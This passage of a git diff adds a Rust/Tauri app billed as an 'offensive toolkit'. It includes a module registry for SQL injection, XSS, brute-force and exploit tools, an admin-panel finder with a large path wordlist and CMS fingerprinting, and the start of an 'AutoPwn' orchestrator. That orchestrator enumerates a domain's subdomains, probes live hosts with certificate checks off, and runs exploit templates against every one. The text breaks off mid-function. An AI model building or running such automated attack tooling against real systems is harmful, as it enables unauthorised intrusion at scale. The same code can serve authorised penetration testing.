+@rem
+@rem Licensed under the Apache License, Version 2.0 (the "License");
+@rem you may not use this file except in compliance with the License.
+@rem You may obtain a copy of the License at
+@rem
+@rem      https://www.apache.org/licenses/LICENSE-2.0
+@rem
+@rem Unless required by applicable law or agreed to in writing, software
+@rem distributed under the License is distributed on an "AS IS" BASIS,
+@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+@rem See the License for the specific language governing permissions and
+@rem limitations under the License.
+@rem
+
+@if "%DEBUG%" == "" @echo off
+@rem ##########################################################################
+@rem
+@rem  Gradle startup script for Windows
+@rem
+@rem ##########################################################################
+
+@rem Set local scope for the variables with windows NT shell
+if "%OS%"=="Windows_NT" setlocal
+
+set DIRNAME=%~dp0
+if "%DIRNAME%" == "" set DIRNAME=.
+set APP_BASE_NAME=%~n0
+set APP_HOME=%DIRNAME%
+
+@rem Resolve any "." and ".." in APP_HOME to make it shorter.
+for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi
+
+@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script.
+set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m"
+
+@rem Find java.exe
+if defined JAVA_HOME goto findJavaFromJavaHome
+
+set JAVA_EXE=java.exe
+%JAVA_EXE% -version >NUL 2>&1
+if "%ERRORLEVEL%" == "0" goto execute
+
+echo.
+echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH.
+echo.
+echo Please set the JAVA_HOME variable in your environment to match the
+echo location of your Java installation.
+
+goto fail
+
+:findJavaFromJavaHome
+set JAVA_HOME=%JAVA_HOME:"=%
+set JAVA_EXE=%JAVA_HOME%/bin/java.exe
+
+if exist "%JAVA_EXE%" goto execute
+
+echo.
+echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME%
+echo.
+echo Please set the JAVA_HOME variable in your environment to match the
+echo location of your Java installation.
+
+goto fail
+
+:execute
+@rem Setup the command line
+
+set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar
+
+
+@rem Execute Gradle
+"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %*
+
+:end
+@rem End local scope for the variables with windows NT shell
+if "%ERRORLEVEL%"=="0" goto mainEnd
+
+:fail
+rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of
+rem the _cmd.exe /c_ return code!
+if  not "" == "%GRADLE_EXIT_CONSOLE%" exit 1
+exit /b 1
+
+:mainEnd
+if "%OS%"=="Windows_NT" endlocal
+
+:omega
diff --git a/src-tauri/gen/android/settings.gradle b/src-tauri/gen/android/settings.gradle
new file mode 100644
index 0000000..3939116
--- /dev/null
+++ b/src-tauri/gen/android/settings.gradle
@@ -0,0 +1,3 @@
+include ':app'
+
+apply from: 'tauri.settings.gradle'
diff --git a/src-tauri/icons/128x128.png b/src-tauri/icons/128x128.png
new file mode 100644
index 0000000..f4cb672
Binary files /dev/null and b/src-tauri/icons/128x128.png differ
diff --git a/src-tauri/icons/128x128@2x.png b/src-tauri/icons/128x128@2x.png
new file mode 100644
index 0000000..8f3fda0
Binary files /dev/null and b/src-tauri/icons/128x128@2x.png differ
diff --git a/src-tauri/icons/32x32.png b/src-tauri/icons/32x32.png
new file mode 100644
index 0000000..b01ebf9
Binary files /dev/null and b/src-tauri/icons/32x32.png differ
diff --git a/src-tauri/icons/Square107x107Logo.png b/src-tauri/icons/Square107x107Logo.png
new file mode 100644
index 0000000..b1a699d
Binary files /dev/null and b/src-tauri/icons/Square107x107Logo.png differ
diff --git a/src-tauri/icons/Square142x142Logo.png b/src-tauri/icons/Square142x142Logo.png
new file mode 100644
index 0000000..c70f648
Binary files /dev/null and b/src-tauri/icons/Square142x142Logo.png differ
diff --git a/src-tauri/icons/Square150x150Logo.png b/src-tauri/icons/Square150x150Logo.png
new file mode 100644
index 0000000..e6835bf
Binary files /dev/null and b/src-tauri/icons/Square150x150Logo.png differ
diff --git a/src-tauri/icons/Square284x284Logo.png b/src-tauri/icons/Square284x284Logo.png
new file mode 100644
index 0000000..b99e796
Binary files /dev/null and b/src-tauri/icons/Square284x284Logo.png differ
diff --git a/src-tauri/icons/Square30x30Logo.png b/src-tauri/icons/Square30x30Logo.png
new file mode 100644
index 0000000..ef6856d
Binary files /dev/null and b/src-tauri/icons/Square30x30Logo.png differ
diff --git a/src-tauri/icons/Square310x310Logo.png b/src-tauri/icons/Square310x310Logo.png
new file mode 100644
index 0000000..7620bfe
Binary files /dev/null and b/src-tauri/icons/Square310x310Logo.png differ
diff --git a/src-tauri/icons/Square44x44Logo.png b/src-tauri/icons/Square44x44Logo.png
new file mode 100644
index 0000000..dfa8de5
Binary files /dev/null and b/src-tauri/icons/Square44x44Logo.png differ
diff --git a/src-tauri/icons/Square71x71Logo.png b/src-tauri/icons/Square71x71Logo.png
new file mode 100644
index 0000000..1ef79be
Binary files /dev/null and b/src-tauri/icons/Square71x71Logo.png differ
diff --git a/src-tauri/icons/Square89x89Logo.png b/src-tauri/icons/Square89x89Logo.png
new file mode 100644
index 0000000..1fd5f66
Binary files /dev/null and b/src-tauri/icons/Square89x89Logo.png differ
diff --git a/src-tauri/icons/StoreLogo.png b/src-tauri/icons/StoreLogo.png
new file mode 100644
index 0000000..6a84909
Binary files /dev/null and b/src-tauri/icons/StoreLogo.png differ
diff --git a/src-tauri/icons/icon.icns b/src-tauri/icons/icon.icns
new file mode 100644
index 0000000..12a5bce
Binary files /dev/null and b/src-tauri/icons/icon.icns differ
diff --git a/src-tauri/icons/icon.ico b/src-tauri/icons/icon.ico
new file mode 100644
index 0000000..b222f4f
Binary files /dev/null and b/src-tauri/icons/icon.ico differ
diff --git a/src-tauri/icons/icon.png b/src-tauri/icons/icon.png
new file mode 100644
index 0000000..0ab2720
Binary files /dev/null and b/src-tauri/icons/icon.png differ
diff --git a/src-tauri/src/lib.rs b/src-tauri/src/lib.rs
new file mode 100644
index 0000000..c70bab8
--- /dev/null
+++ b/src-tauri/src/lib.rs
@@ -0,0 +1,59 @@
+mod modules;
+
+use modules::{admin_finder, autopwn, banner, dirfuzz, dns_tools, domain_grabber, form_brute, httpx, jwt, lan_map, port_scan, repeater, sqli, ssl_scan, subdomain, takeover, xploiter, xploiter_store, xss};
+
+#[tauri::command]
+fn banner() -> &'static str {
+    "Pocket Pentester v0.1 // offensive toolkit"
+}
+
+#[tauri::command]
+fn default_ports() -> Vec<u16> {
+    port_scan::top_1000_ports()
+}
+
+#[cfg_attr(mobile, tauri::mobile_entry_point)]
+pub fn run() {
+    tauri::Builder::default()
+        .plugin(tauri_plugin_opener::init())
+        .invoke_handler(tauri::generate_handler![
+            banner,
+            default_ports,
+            port_scan::port_scan,
+            subdomain::subdomain_enum,
+            subdomain::subdomain_sources,
+            httpx::http_probe,
+            takeover::takeover_scan,
+            sqli::sqli_scan,
+            xss::xss_scan,
+            jwt::jwt_analyze,
+            xploiter::xploit_run,
+            xploiter_store::xploit_store_init,
+            xploiter_store::xploit_store_list,
+            xploiter_store::xploit_store_read,
+            xploiter_store::xploit_store_save,
+            xploiter_store::xploit_store_delete,
+            xploiter_store::xploit_store_duplicate,
+            xploiter_store::xploit_store_starter_template,
+            autopwn::autopwn_run,
+            lan_map::lan_scan,
+            lan_map::lan_local_info,
+            repeater::repeater_send,
+            repeater::repeater_to_curl,
+            dirfuzz::dirfuzz_run,
+            dirfuzz::dirfuzz_common_wordlist,
+            admin_finder::admin_finder_run,
+            admin_finder::admin_finder_wordlist,
+            form_brute::form_brute_run,
+            form_brute::form_brute_common_users,
+            form_brute::form_brute_common_passwords,
+            dns_tools::dns_query,
+            ssl_scan::ssl_scan,
+            banner::banner_grab,
+            domain_grabber::iana_tld_list,
+            domain_grabber::domain_grab,
+            domain_grabber::wordlist_info,
+        ])
+        .run(tauri::generate_context!())
+        .expect("error while running tauri application");
+}
diff --git a/src-tauri/src/main.rs b/src-tauri/src/main.rs
new file mode 100644
index 0000000..0f8e0a4
--- /dev/null
+++ b/src-tauri/src/main.rs
@@ -0,0 +1,6 @@
+// Prevents additional console window on Windows in release, DO NOT REMOVE!!
+#![cfg_attr(not(debug_assertions), windows_subsystem = "windows")]
+
+fn main() {
+    pocketpentester_lib::run()
+}
diff --git a/src-tauri/src/modules/admin_finder.rs b/src-tauri/src/modules/admin_finder.rs
new file mode 100644
index 0000000..e2e8ad8
--- /dev/null
+++ b/src-tauri/src/modules/admin_finder.rs
@@ -0,0 +1,312 @@
+// ===================================================================
+// Admin Panel Finder — probe common admin/login paths, detect CMS.
+// Bundled with 450+ high-signal admin paths.
+// ===================================================================
+
+use std::collections::HashSet;
+use std::sync::Arc;
+use std::time::Duration;
+
+use futures::stream::{self, StreamExt};
+use once_cell::sync::Lazy;
+use regex::Regex;
+use serde::{Deserialize, Serialize};
+use tauri::{AppHandle, Emitter};
+use tokio::sync::Semaphore;
+
+#[derive(Debug, Clone, Deserialize)]
+pub struct AdminFindRequest {
+    pub base_url: String,
+    #[serde(default)]
+    pub extra_paths: Vec<String>,
+    #[serde(default)]
+    pub use_builtin: bool,
+    #[serde(default)]
+    pub accept_status: Option<Vec<u16>>,
+    pub concurrency: usize,
+    pub timeout_ms: u64,
+    #[serde(default)]
+    pub follow_redirects: bool,
+}
+
+#[derive(Debug, Clone, Serialize)]
+pub struct AdminHit {
+    pub url: String,
+    pub status: u16,
+    pub size: u64,
+    pub title: Option<String>,
+    pub platform: Option<String>,
+    pub login_form: bool,
+    pub auth_header: Option<String>,
+    pub redirect: Option<String>,
+}
+
+static TITLE_RE: Lazy<Regex> = Lazy::new(|| Regex::new(r"(?is)<title[^>]*>(.*?)</title>").unwrap());
+static LOGIN_RE: Lazy<Regex> = Lazy::new(|| Regex::new(r#"(?is)<(?:input|form)[^>]*(?:type=['"]password['"]|name=['"]password['"]|name=['"]passwd['"])"#).unwrap());
+
+fn detect_platform(body: &str, title: &Option<String>, hdrs: &reqwest::header::HeaderMap) -> Option<String> {
+    let lo = body.to_lowercase();
+    let t = title.clone().unwrap_or_default().to_lowercase();
+    let powered = hdrs.get("x-powered-by").and_then(|v| v.to_str().ok()).unwrap_or("").to_lowercase();
+    let server = hdrs.get("server").and_then(|v| v.to_str().ok()).unwrap_or("").to_lowercase();
+
+    if lo.contains("wp-login") || lo.contains("wp-submit") || t.contains("wordpress") { return Some("WordPress".into()); }
+    if lo.contains("com_users") || lo.contains("joomla") || t.contains("joomla") { return Some("Joomla".into()); }
+    if lo.contains("drupal-settings-json") || t.contains("drupal") { return Some("Drupal".into()); }
+    if lo.contains("dashboardwidgets") || lo.contains("wp-admin") { return Some("WordPress admin".into()); }
+    if t.contains("phpmyadmin") || lo.contains("phpmyadmin") { return Some("phpMyAdmin".into()); }
+    if lo.contains("adminer") || t.contains("adminer") { return Some("Adminer".into()); }
+    if t.contains("jenkins") || lo.contains("jenkins") { return Some("Jenkins".into()); }
+    if t.contains("jira") { return Some("Jira".into()); }
+    if t.contains("confluence") { return Some("Confluence".into()); }
+    if t.contains("gitlab") { return Some("GitLab".into()); }
+    if t.contains("grafana") || lo.contains("grafana") { return Some("Grafana".into()); }
+    if t.contains("kibana") { return Some("Kibana".into()); }
+    if t.contains("solr") { return Some("Apache Solr".into()); }
+    if t.contains("tomcat") || lo.contains("apache tomcat") { return Some("Apache Tomcat".into()); }
+    if t.contains("cpanel") { return Some("cPanel".into()); }
+    if t.contains("plesk") { return Some("Plesk".into()); }
+    if t.contains("directadmin") { return Some("DirectAdmin".into()); }
+    if t.contains("webmin") { return Some("Webmin".into()); }
+    if t.contains("mikrotik") { return Some("Mikrotik".into()); }
+    if t.contains("pfsense") { return Some("pfSense".into()); }
+    if t.contains("opnsense") { return Some("OPNsense".into()); }
+    if powered.contains("asp.net") { return Some("ASP.NET".into()); }
+    if powered.contains("php") { return Some("PHP".into()); }
+    if server.contains("iis") { return Some("IIS".into()); }
+    if server.contains("nginx") { return Some("nginx".into()); }
+    if server.contains("apache") { return Some("Apache".into()); }
+    None
+}
+
+#[tauri::command]
+pub fn admin_finder_wordlist() -> Vec<&'static str> {
+    BUILTIN.to_vec()
+}
+
+#[tauri::command]
+pub async fn admin_finder_run(app: AppHandle, req: AdminFindRequest) -> Result<Vec<AdminHit>, String> {
+    let base = req.base_url.trim_end_matches('/').to_string();
+    let accept: HashSet<u16> = req.accept_status.clone()
+        .unwrap_or_else(|| vec![200, 201, 301, 302, 307, 308, 401, 403])
+        .into_iter().collect();
+
+    let mut paths: HashSet<String> = HashSet::new();
+    if req.use_builtin {
+        for p in BUILTIN.iter() { paths.insert(p.trim_start_matches('/').to_string()); }
+    }
+    for p in &req.extra_paths {
+        let t = p.trim().trim_start_matches('/').to_string();
+        if !t.is_empty() { paths.insert(t); }
+    }
+    if paths.is_empty() {
+        return Err("no paths to probe (enable builtin or provide extra_paths)".into());
+    }
+
+    let client = reqwest::Client::builder()
+        .danger_accept_invalid_certs(true)
+        .timeout(Duration::from_millis(req.timeout_ms))
+        .redirect(if req.follow_redirects {
+            reqwest::redirect::Policy::limited(5)
+        } else {
+            reqwest::redirect::Policy::none()
+        })
+        .user_agent("Mozilla/5.0 (PocketPentester-AdminFinder)")
+        .build()
+        .map_err(|e| e.to_string())?;
+
+    let total = paths.len();
+    let _ = app.emit("adminfind:status", format!("probing {total} admin path(s) on {base}"));
+    let sem = Arc::new(Semaphore::new(req.concurrency.max(1)));
+    let done = Arc::new(std::sync::atomic::AtomicUsize::new(0));
+    let client = Arc::new(client);
+
+    let hits: Vec<AdminHit> = stream::iter(paths.into_iter())
+        .map(|p| {
+            let base = base.clone();
+            let client = client.clone();
+            let sem = sem.clone();
+            let done = done.clone();
+            let accept = accept.clone();
+            let app = app.clone();
+            async move {
+                let _permit = sem.acquire().await.unwrap();
+                let url = format!("{}/{}", base, p);
+                let resp = match client.get(&url).send().await {
+                    Ok(r) => r,
+                    Err(_) => {
+                        let n = done.fetch_add(1, std::sync::atomic::Ordering::Relaxed) + 1;
+                        let _ = app.emit("adminfind:progress", serde_json::json!({"done": n, "total": total}));
+                        return None;
+                    }
+                };
+                let n = done.fetch_add(1, std::sync::atomic::Ordering::Relaxed) + 1;
+                let _ = app.emit("adminfind:progress", serde_json::json!({"done": n, "total": total}));
+
+                let status = resp.status().as_u16();
+                if !accept.contains(&status) { return None; }
+
+                let hdrs = resp.headers().clone();
+                let auth = hdrs.get("www-authenticate").and_then(|v| v.to_str().ok()).map(String::from);
+                let redirect = hdrs.get("location").and_then(|v| v.to_str().ok()).map(String::from);
+                let body = resp.text().await.unwrap_or_default();
+                let title = TITLE_RE.captures(&body)
+                    .and_then(|c| c.get(1))
+                    .map(|m| m.as_str().trim().chars().take(100).collect::<String>())
+                    .filter(|s| !s.is_empty());
+                let login = LOGIN_RE.is_match(&body) || auth.is_some();
+                let platform = detect_platform(&body, &title, &hdrs);
+
+                let hit = AdminHit {
+                    url,
+                    status,
+                    size: body.len() as u64,
+                    title,
+                    platform,
+                    login_form: login,
+                    auth_header: auth,
+                    redirect,
+                };
+                let _ = app.emit("adminfind:hit", hit.clone());
+                Some(hit)
+            }
+        })
+        .buffer_unordered(req.concurrency.max(1))
+        .filter_map(|x| async move { x })
+        .collect()
+        .await;
+
+    let _ = app.emit("adminfind:done", hits.len());
+    Ok(hits)
+}
+
+// ------------------------------------------------------------------
+// Built-in admin path wordlist (~320 high-signal paths)
+// ------------------------------------------------------------------
+const BUILTIN: &[&str] = &[
+    // generic
+    "admin", "admin/", "admin.php", "admin.html", "admin.asp", "admin.aspx", "admin.jsp",
+    "admin/login", "admin/login.php", "admin/login.html", "admin/index.php", "admin/index.html",
+    "admin/admin.php", "admin/home.php", "admin/home", "admin/dashboard", "admin/panel",
+    "admin/admin_login", "admin/account.php", "admin/admin-login", "admin/controlpanel",
+    "admin/controlpanel.html", "admin/cp.php", "admin/cp.html",
+    "admin1", "admin1.php", "admin1.html", "admin2", "admin2.php", "admin2.html",
+    "administrator", "administrator/", "administrator/index.php", "administrator/login.php",
+    "administrator/account.php", "administrator/account.html",
+    "adm", "adm/", "adm/index.php", "adm/admloginuser.php",
+    "panel", "panel-administracion", "panel/", "controlpanel", "controlpanel/",
+    "webadmin", "webadmin/", "webadmin/index.php", "webadmin/admin",
+    "login", "login.php", "login.html", "login.asp", "login.aspx", "login.jsp",
+    "log-in", "signin", "sign-in", "sign_in", "sign_up", "signup",
+    "account", "account/login", "account.php", "accounts/login",
+    "user/login", "users/sign_in", "users/login",
+    "home.php", "home.html", "main.php", "main.html",
+
+    // wordpress
+    "wp-admin", "wp-admin/", "wp-login.php", "wp-admin/admin-ajax.php",
+    "wp-admin/install.php", "wp-admin/upgrade.php", "wp-admin/setup-config.php",
+    "wp-content/plugins/", "wp-content/themes/", "wp-json/wp/v2/users",
+
+    // joomla
+    "administrator/index.php", "administrator/components/",
+
+    // drupal
+    "user", "user/login", "user/register", "admin/structure",
+
+    // magento
+    "admin/admin", "admin/dashboard/", "magento_version",
+    "index.php/admin/", "customer/account/login/",
+
+    // prestashop
+    "modules/ps_shoppingcart",
+
+    // opencart
+    "admin/index.php?route=common/login",
+
+    // laravel
+    "login", "register", "password/reset", "horizon", "telescope",
+
+    // phpmyadmin / db admin
+    "phpmyadmin", "phpmyadmin/", "phpmyadmin/index.php", "pma", "pma/", "pmamy", "pmamy2",
+    "dbadmin", "dbadmin/", "mysql", "mysql/", "sqlmanager", "sqlmanager/",
+    "adminer.php", "adminer/", "adminer", "phpMyAdmin/",
+
+    // cpanel / plesk / webmin
+    "cpanel", "cpanel/", ":2082", ":2083",
+    "plesk", "plesk/", ":8443",
+    "webmin", "webmin/", ":10000",
+    "directadmin", ":2222",
+    "ispconfig", "vesta",
+
+    // tomcat / jboss / weblogic
+    "manager/html", "manager/status", "host-manager/html",
+    "jmx-console/", "web-console/", "admin-console/",
+    "invoker/", "console/", "wls-wsat/CoordinatorPortType",
+
+    // elasticsearch / kibana / solr
+    "_cluster/health", "_cat/indices", "_all",
+    "kibana", "app/kibana",
+    "solr/", "solr/admin/cores", "solr/#/",
+
+    // jenkins / gitlab / gitea
+    "jenkins", "jenkins/", "jenkins/login",
+    "gitlab/users/sign_in", "user/login",
+    "admin/appearance",
+
+    // grafana / prometheus
+    "grafana", "grafana/login",
+    "prometheus", "prometheus/graph",
+
+    // rabbitmq / kafka ui
+    "rabbitmq", ":15672", "#/queues",
+
+    // api platforms
+    "api/admin", "api/administrator", "api/v1/admin", "api/login", "api/users",
+    "graphql", "graphiql", "playground",
+    "swagger", "swagger-ui", "swagger-ui.html", "swagger.json", "swagger/v1/swagger.json",
+    "api-docs", "openapi.json", "openapi.yaml", "v2/api-docs",
+    "actuator", "actuator/health", "actuator/env", "actuator/heapdump", "actuator/mappings",
+
+    // routers / network appliances
+    "cgi-bin/luci", "cgi-bin/admin", "cgi-bin/login",
+    "router", "router/login",
+
+    // mikrotik / pfsense / opnsense
+    "webfig", "winbox",
+    "system_advanced_admin.php", "diag_backup.php",
+
+    // misc control panels
+    "dashboard", "dashboard/", "dashboard/login",
+    "manage", "manage/", "manager/", "control", "control/", "siteadmin", "siteadmin/",
+    "moderator", "moderator/", "operator/", "supervisor/",
+    "console", "console/", "backend", "backend/", "staff", "staff/",
+    "system", "system/", "system/login", "system/admin",
+    "cms", "cms/", "cms/login",
+    "portal", "portal/", "portal/login",
+
+    // auth endpoints
+    "oauth", "oauth/authorize", "oauth2/authorize", "sso",
+    ".well-known/openid-configuration",
+
+    // file managers
+    "files", "filemanager", "file_manager", "filemanager/", "files/login",
+
+    // backup / debug / test
+    "test", "test/", "testing", "staging", "stage", "beta", "dev", "development",
+    "old", "old/", "tmp", "temp", "cache", "backup", "backups",
+
+    // vendor-specific
+    "owa", "owa/auth/logon.aspx", "ecp/default.aspx",
+    "citrix", "vpn/index_access.html",
+    "vcenter", "ui/", "vsphere-client/",
+    "splunk", "en-US/account/login",
+    "sonarqube", "sessions/new",
+    "nexus", "artifactory",
+    "harbor", "portainer",
+    "rancher", "rancher/login",
+
+    // legacy / misc
+    "home", "member", "members", "members/", "private", "private/",
+    "secure", "secure/", "vip", "vip/",
+    "webadm", "siteadm", "backoffice",
+];
diff --git a/src-tauri/src/modules/autopwn.rs b/src-tauri/src/modules/autopwn.rs
new file mode 100644
index 0000000..067a788
--- /dev/null
+++ b/src-tauri/src/modules/autopwn.rs
@@ -0,0 +1,417 @@
+// ===================================================================
+// AutoPwn — one-shot orchestrator: subdomain → probe → exploit.
+//
+// Stage 1: passive crt.sh + optional DNS brute
+// Stage 2: live-host HTTP/S probe (concurrent)
+// Stage 3: xploit all selected templates on every alive host
+//
+// Emits `autopwn:*` events so the UI dashboard can track each stage
+// independently without colliding with standalone tool events.
+// ===================================================================
+
+use std::collections::HashSet;
+use std::sync::Arc;
+use std::time::Duration;
+
+use futures::stream::{self, StreamExt};
+use hickory_resolver::config::{ResolverConfig, ResolverOpts};
+use hickory_resolver::TokioAsyncResolver;
+use serde::{Deserialize, Serialize};
+use tauri::{AppHandle, Emitter};
+use tokio::sync::Semaphore;
+
+use super::xploiter::{parse_templates, run_template_against_target, Finding};
+
+#[derive(Debug, Clone, Deserialize)]
+pub struct AutopwnRequest {
+    pub domain: String,
+    pub use_passive: bool,
+    pub brute_wordlist: Vec<String>,
+    pub templates_yaml: Vec<String>,
+    pub probe_ports: Option<Vec<u16>>,
+    pub concurrency: usize,
+    pub timeout_ms: u64,
+
+    /// Status codes considered "alive" for the exploit stage.
+    /// Default: 200-299, 301, 302, 307, 308, 401, 403, 405.
+    /// Explicitly rejects 400 (bad req / wrong SNI), 404 (no vhost),
+    /// 5xx (backend dead).
+    #[serde(default)]
+    pub accept_status: Option<Vec<u16>>,
+}
+
+#[derive(Debug, Clone, Serialize)]
+pub struct AutopwnSubHit {
+    pub host: String,
+    pub source: String,
+    pub ips: Vec<String>,
+}
+
+#[derive(Debug, Clone, Serialize)]
+pub struct AutopwnProbeHit {
+    pub url: String,
+    pub status: u16,
+    pub title: Option<String>,
+    pub server: Option<String>,
+}
+
+#[derive(Debug, Clone, Serialize)]
+pub struct AutopwnReport {
+    pub domain: String,
+    pub subdomains: Vec<AutopwnSubHit>,
+    pub alive: Vec<AutopwnProbeHit>,
+    pub findings: Vec<Finding>,
+}
+
+// --------------------------------------------------------------
+// stage 1: subdomain enum
+// --------------------------------------------------------------
+
+#[derive(Debug, Clone, Deserialize)]
+struct CrtRow { name_value: String }
+
+async fn passive_crtsh(domain: &str) -> anyhow::Result<HashSet<String>> {
+    let url = format!("https://crt.sh/?q=%25.{}&output=json", domain);
+    let client = reqwest::Client::builder()
+        .timeout(Duration::from_secs(20))
+        .user_agent("PocketPentester-AutoPwn/0.1")
+        .build()?;
+    let rows: Vec<CrtRow> = client.get(&url).send().await?.json().await?;
+    let mut set = HashSet::new();
+    for r in rows {
+        for line in r.name_value.split('\n') {
+            let host = line.trim().trim_start_matches("*.").to_lowercase();
+            if host.ends_with(domain) && !host.is_empty() { set.insert(host); }
+        }
+    }
+    Ok(set)
+}
+
+fn rand_label() -> String {
+    use rand::Rng;
+    let chars: Vec<char> = "abcdefghijklmnopqrstuvwxyz0123456789".chars().collect();
+    let mut rng = rand::thread_rng();
+    (0..16).map(|_| chars[rng.gen_range(0..chars.len())]).collect()
+}
+
+/// Detect wildcard DNS by resolving 2 random non-existent subs.
+/// Returns the set of IPs that appear to be catch-all answers.
+async fn detect_wildcard(resolver: &TokioAsyncResolver, domain: &str) -> HashSet<String> {
+    let mut ips: HashSet<String> = HashSet::new();
+    for _ in 0..2 {
+        let probe = format!("{}.{}", rand_label(), domain);
+        if let Ok(lookup) = resolver.lookup_ip(probe.as_str()).await {
+            for ip in lookup.iter() {
+                ips.insert(ip.to_string());
+            }
+        }
+    }
+    ips
+}
+
+async fn enum_subdomains(
+    app: &AppHandle,
+    domain: &str,
+    use_passive: bool,
+    brute: &[String],
+    concurrency: usize,
+) -> Vec<AutopwnSubHit> {
+    let mut opts = ResolverOpts::default();
+    opts.timeout = Duration::from_secs(3);
+    opts.attempts = 1;
+    let resolver = Arc::new(TokioAsyncResolver::tokio(ResolverConfig::cloudflare(), opts));
+
+    // wildcard detection BEFORE brute
+    let wildcard = detect_wildcard(&resolver, domain).await;
+    if !wildcard.is_empty() {
+        let _ = app.emit(
+            "autopwn:status",
+            format!("wildcard DNS detected ({} IPs) — results pointing only to these will be filtered",
+                wildcard.iter().cloned().collect::<Vec<_>>().join(","))
+        );
+    }
+
+    let mut candidates: HashSet<(String, String)> = HashSet::new();
+    candidates.insert((domain.to_string(), "root".into()));
+
+    if use_passive {
+        let _ = app.emit("autopwn:stage", "recon:passive");
+        match passive_crtsh(domain).await {
+            Ok(hosts) => {
+                let _ = app.emit("autopwn:status", format!("crt.sh: +{} subs", hosts.len()));
+                for h in hosts { candidates.insert((h, "crtsh".into())); }
+            }
+            Err(e) => { let _ = app.emit("autopwn:status", format!("crt.sh error: {e}")); }
+        }
+    }
+
+    for w in brute {
+        candidates.insert((format!("{}.{}", w.trim(), domain), "brute".into()));
+    }
+
+    let total = candidates.len();
+    let _ = app.emit("autopwn:stage", "recon:resolve");
+    let _ = app.emit("autopwn:status", format!("resolving {total} candidates"));
+
+    let sem = Arc::new(Semaphore::new(concurrency.max(1)));
+    let done = Arc::new(std::sync::atomic::AtomicUsize::new(0));
+
+    let wildcard_arc = Arc::new(wildcard);
+
+    let hits: Vec<AutopwnSubHit> = stream::iter(candidates.into_iter())
+        .map(|(host, source)| {
+            let resolver = resolver.clone();
+            let sem = sem.clone();
+            let done = done.clone();
+            let app = app.clone();
+            let wildcard = wildcard_arc.clone();
+            async move {
+                let _p = sem.acquire().await.unwrap();
+                let result = resolver.lookup_ip(host.as_str()).await;
+                let n = done.fetch_add(1, std::sync::atomic::Ordering::Relaxed) + 1;
+                let _ = app.emit("autopwn:progress", serde_json::json!({
+                    "stage": "recon", "done": n, "total": total
+                }));
+                match result {
+                    Ok(lookup) => {
+                        let ips: Vec<String> = lookup.iter().map(|ip| ip.to_string()).collect();
+                        if ips.is_empty() { return None; }
+
+                        // wildcard filter: skip if ALL ips match the wildcard set
+                        // (keep root domain regardless)
+                        if !wildcard.is_empty() && source != "root"
+                            && ips.iter().all(|ip| wildcard.contains(ip))
+                        {
+                            return None;
+                        }
+
+                        let hit = AutopwnSubHit { host, source, ips };
+                        let _ = app.emit("autopwn:sub", hit.clone());
+                        Some(hit)
+                    }
+                    Err(_) => None,
+                }
+            }
+        })
+        .buffer_unordered(concurrency.max(1))
+        .filter_map(|x| async move { x })
+        .collect()
+        .await;
+
+    hits
+}
+
+/// Default HTTP status codes treated as "alive & worth exploiting".
+fn default_accept_statuses() -> Vec<u16> {
+    vec![
+        200, 201, 202, 203, 204, 206,
+        301, 302, 303, 307, 308,
+        401, 403, 405, 418, // 418 = sometimes WAF, but still shows alive service
+    ]
+}
+
+// --------------------------------------------------------------
+// stage 2: HTTP probe
+// --------------------------------------------------------------
+
+async fn probe_hosts(
+    app: &AppHandle,
+    hosts: &[AutopwnSubHit],
+    ports: &[u16],
+    concurrency: usize,
+    timeout_ms: u64,
+    accept_status: &[u16],
+) -> Vec<AutopwnProbeHit> {
+    let client = reqwest::Client::builder()
+        .danger_accept_invalid_certs(true)
+        .timeout(Duration::from_millis(timeout_ms))
+        .redirect(reqwest::redirect::Policy::limited(3))
+        .user_agent("Mozilla/5.0 (PocketPentester-AutoPwn)")
+        .build()
+        .unwrap_or_else(|_| reqwest::Client::new());
+
+    let mut urls: Vec<String> = Vec::new();
+    for h in hosts {
+        for p in ports {
+            let scheme = if matches!(p, 443 | 8443) { "https" } else { "http" };
+            if *p == 80 || *p == 443 {
+                urls.push(format!("{scheme}://{}", h.host));
+            } else {
+                urls.push(format!("{scheme}://{}:{}", h.host, p));
+            }
+        }
+    }
+
+    let total = urls.len();
+    let _ = app.emit("autopwn:stage", "probe");
+    let _ = app.emit("autopwn:status", format!("probing {total} urls"));
+
+    let sem = Arc::new(Semaphore::new(concurrency.max(1)));
+    let done = Arc::new(std::sync::atomic::AtomicUsize::new(0));
+    let client = Arc::new(client);
+
+    let title_re = regex::Regex::new(r"(?is)<title[^>]*>(.*?)</title>").unwrap();
+    // regex that recognizes "nothing useful" responses — default pages, error placeholders, etc.
+    let junk_re = regex::Regex::new(
+        r"(?i)(?:welcome to nginx|it works|apache2 ubuntu default page|test page for the (?:apache|nginx)|site not found|default backend - 404|403 forbidden</center>|bad request</h1>|invalid hostname)"
+    ).unwrap();
+    let accept: HashSet<u16> = accept_status.iter().copied().collect();
+
+    let alive: Vec<AutopwnProbeHit> = stream::iter(urls.into_iter())
+        .map(|url| {
+            let sem = sem.clone();
+            let done = done.clone();
+            let client = client.clone();
+            let app = app.clone();
+            let title_re = title_re.clone();
+            let junk_re = junk_re.clone();
+            let accept = accept.clone();
+            async move {
+                let _p = sem.acquire().await.unwrap();
+                let result = client.get(&url).send().await;
+                let n = done.fetch_add(1, std::sync::atomic::Ordering::Relaxed) + 1;
+                let _ = app.emit("autopwn:progress", serde_json::json!({
+                    "stage": "probe", "done": n, "total": total
+                }));
+                let resp = match result { Ok(r) => r, Err(_) => return None };
+                let status = resp.status().as_u16();
+
+                // ---- status whitelist ----
+                if !accept.contains(&status) {
+                    let _ = app.emit("autopwn:status",
+                        format!("skip {} ({}): status not in accept-list", url, status));
+                    return None;
+                }
+
+                let server = resp.headers().get("server")
+                    .and_then(|v| v.to_str().ok()).map(String::from);
+                let body = resp.text().await.unwrap_or_default();
+
+                // ---- junk-body filter ----
+                if junk_re.is_match(&body) {
